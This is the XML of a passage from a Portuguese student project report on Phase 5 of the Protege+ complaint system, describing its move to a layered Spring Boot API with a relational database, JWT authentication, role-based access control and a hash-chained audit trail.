        <w:t xml:space="preserve">O que o enunciado pede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Relate quais foram as evoluções no HackGov realizadas desde a última entrega de atividade.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Esta Parte cumpre o requisito em três movimentos: a seção 1.1 dá o panorama da mudança; as seções 1.2 a 1.9 detalham cada frente de evolução com a evidência correspondente no código; a seção 1.10 registra o tratamento dado às ressalvas recebidas nas avaliações anteriores, e a 1.11 traz o registro cronológico do que foi construído dentro desta fase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="31" w:name="o-que-a-fase-5-mudou-o-panorama"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 O que a Fase 5 mudou: o panorama</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entre a entrega da Fase 4 e esta entrega, o Protege+ deixou de ser uma aplicação que rodava inteiramente no navegador e passou a ser um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sistema cliente-servidor com API REST, banco de dados relacional, autenticação, controle de acesso, trilha de auditoria e documentação interativa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A mudança não foi cosmética. Ela alterou três coisas que definem o que um sistema é:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">onde o dado vive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quem pode lê-lo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como o sistema se comporta quando algo falha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82"/>
        <w:gridCol w:w="2970"/>
        <w:gridCol w:w="3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5 (atual)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Arquitetura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Monolito front-end, no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Cliente-servidor: front-end + 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Persistência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(~5 MB, por navegador)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PostgreSQL/Supabase, com H2 embutido para execução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da verdade do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JavaScript no cliente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ScoreService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, no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Simulada no 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 + JWT +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Inteligência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 em JS (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vigia.js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VigiaService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">com Google Gemini e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">fallback</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">por regras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 executável em</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/swagger-ui.html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Inexistente no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com 5 perfis, aplicado por rota e por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Trilha de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imutável encadeado por SHA-256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Manipulação de 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Base64 no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por</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">multipart/form-data</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, validado por assinatura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Inexistentes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 testes JUnit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">em 11 conjuntos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estatístico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Inexistente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EstatisticaService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ 6 gráficos no painel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A frase que melhor resume a diferença é esta: na Fase 4,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tudo o que o sistema sabia, o usuário podia reescrever com o console do navegador aberto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Na Fase 5, o que o navegador tem é uma interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="evolução-medida-número-a-número"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Evolução medida, número a número</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os números abaixo foram medidos nos próprios arquivos do projeto, e não estimados.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36"/>
        <w:gridCol w:w="2442"/>
        <w:gridCol w:w="1056"/>
        <w:gridCol w:w="13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Classes Java de produção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(aplicação de console)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Endpoints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Módulos JavaScript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+286 %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Folhas de estilo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Páginas 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 no modelo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Restrições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Chaves estrangeiras declaradas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declaradas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Chaves de tradução (pt/en)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 ×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+203 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crescimento medido em bytes nos três arquivos principais do front-end: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passou de 52.490 para 79.768 bytes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">+52 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">i18n.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de 12.967 para 39.160 bytes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">+202 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, efeito das telas novas traduzidas para o inglês);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de 61.867 para 69.336 bytes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">+12 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e o crescimento modesto aqui é intencional e explicado na seção 3.3.2: a integração com a API foi feita hidratando as telas existentes, e não reescrevendo-as).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="nasce-a-api-back-end-java-em-camadas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Nasce a API: back-end Java em camadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O programa Java da Fase 3 era uma aplicação de console, com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e coleções em memória. Ele foi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">reescrito como aplicação web em camadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sobre Java 17 e Spring Boot 3.3.4, com separação explícita de responsabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">br.gov.protege</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── ProtegeApplication.java         ponto de entrada</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── audit/      Auditavel               anotação que marca operação auditada</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AuditoriaAspect         interceptador que grava a trilha</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── config/     WebConfig               metadados e segurança do OpenAPI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── security/   JwtService              geração e validação de token</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               JwtAuthFilter           autenticação e perfil por requisição</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               SecurityConfig          regras de acesso, CORS, BCrypt, RBAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               RespostasDeSeguranca    401 e 403 padronizados + auditoria de recusa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               RateLimitFilter         limite de requisições por origem</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── model/      Denuncia                entidade central (JPA)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               HistoricoItem           item embutido da linha do tempo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               Evidencia               metadado do arquivo anexado</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               Membro                  equipe do gestor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               Usuario                 credencial do servidor público</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               PerfilUsuario           enum dos cinco perfis de acesso</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AuditoriaLog            registro da trilha, encadeado por hash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AcaoReversivel          elemento da pilha de desfazer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── dto/        DenunciaRequest              contrato de entrada</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               DenunciaPublicaResponse      canal do cidadão</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               DenunciaResumoResponse       listagem, sem relato nem endereço</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               DenunciaDetalheResponse      detalhe, consulta sensível</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               RelatorioAnaliticoResponse   relatório estatístico da Parte 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               EvidenciaResponse            metadado do anexo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               PageResponse                 envelope de paginação</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AuditoriaResponse            registro da trilha</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── exception/  RecursoNaoEncontradoException, ConflitoException,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               RegraDeNegocioException, ArquivoGrandeDemaisException,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               FormatoNaoSuportadoException</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── mapper/     DenunciaMapper          entidade para resposta, conforme o perfil</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── util/       MascaraUtil             mascaramento de dado pessoal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AssinaturaArquivo       detecção de tipo pelo número mágico</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               NomeArquivoUtil         higienização de nome de arquivo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── repository/ DenunciaRepository, MembroRepository, UsuarioRepository,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               EvidenciaRepository, AuditoriaLogRepository</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── service/    DenunciaService         regra de negócio da denúncia</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               ScoreService            score de confiabilidade</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               VigiaService            análise por IA e por regras</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               FilaAtendimentoService  fila de prioridade (heap binário)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               PilhaAcoesService       pilha de ações reversíveis (LIFO)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               EvidenciaService        recebimento e leitura de arquivos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               ExportacaoService       geração do CSV</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               EstatisticaService      medidas descritivas puras</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               RelatorioService        montagem do relatório analítico</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│               AuditoriaService        gravação e verificação da trilha</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── controller/ AuthController, DenunciaController, MembroController,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                StatsController, VigiaController, FluxoController,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                AuditoriaController, EvidenciaController, ExportacaoController,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                GlobalExceptionHandler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A separação entre entidade, DTO e mapper não é organização decorativa. Ela é a defesa recomendada pela OWASP contra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">mass assignment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cuja orientação é explícita:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use Data Transfer Objects (DTOs)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e restringir por lista de permissão os campos vinculáveis (OWASP, [s.d.]e). Uma aplicação que aceita o corpo da requisição direto na entidade JPA deixa o cliente escolher quais colunas quer escrever, inclusive as que a interface nunca mostrou.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A entidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Denuncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">foi modelada para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">espelhar exatamente o objeto que o front-end já manipulava</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, o que permitiu integrar sem reescrever a interface. Um detalhe técnico relevante: a coluna do campo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foi mapeada como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque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é palavra reservada em SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@Column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"localidade"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local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 linha do tempo da denúncia deixou de ser um vetor solto em JSON e virou uma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">coleção ordenada persistida em tabela própria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@ElementCollection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@CollectionTable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"denuncia_historico"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"denuncia_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@OrderColumn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"ordem"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HistoricoItem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historico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@OrderColumn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é o que garante a rastreabilidade cobrada pela US12: a ordem dos eventos passou a ser uma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">propriedade do banco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, não uma convenção do código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="X0c0f906ffffc42ddea056c264c754079762cd38"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.4 Da memória do navegador ao banco relacional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na Fase 4, toda denúncia vivia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Isso trazia três limitações concretas, e a terceira é a mais grave.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Teto de armazenamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de aproximadamente 5 MB por origem, agravado porque anexos em Base64 ocupam cerca de 33 % a mais que o arquivo original. Uma única foto de celular moderna consome uma fração relevante desse teto.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Dado preso ao dispositivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: uma denúncia registrada no celular não aparecia para o gestor no computador. O canal não funcionava como canal.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Nenhuma garantia de integridade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: o conteúdo era editável pelo console do navegador. Um sistema em que o dado pode ser reescrito por quem o consulta não tem como afirmar nada sobre ele.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Fase 5 resolve os três ao mover a persistência para o servidor. A configuração prevê dois perfis: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Produção.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL gerenciado (Supabase), com credenciais lidas de variáveis de ambiente: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spring.datasource.url=${DB_URL:jdbc:postgresql://localhost:5432/protege}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">spring.datasource.username=${DB_USER:postgres}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">spring.datasource.password=${DB_PASSWORD:postgres}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Execução local e avaliação.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">H2 embutido em arquivo, ativado por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Dspring-boot.run.profiles=h2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sem nenhuma instalação prévia. É o perfil usado na demonstração em vídeo, e é o que permite que o projeto funcione ao ser descompactado, conforme exige a entrega.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A carga inicial (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">data.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) foi escrita de forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">idempotente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT ... SELECT ... WHERE NOT EXISTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, para que reinicializações sucessivas não dupliquem registros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O modelo físico Oracle correspondente (</w:t>
      </w:r>
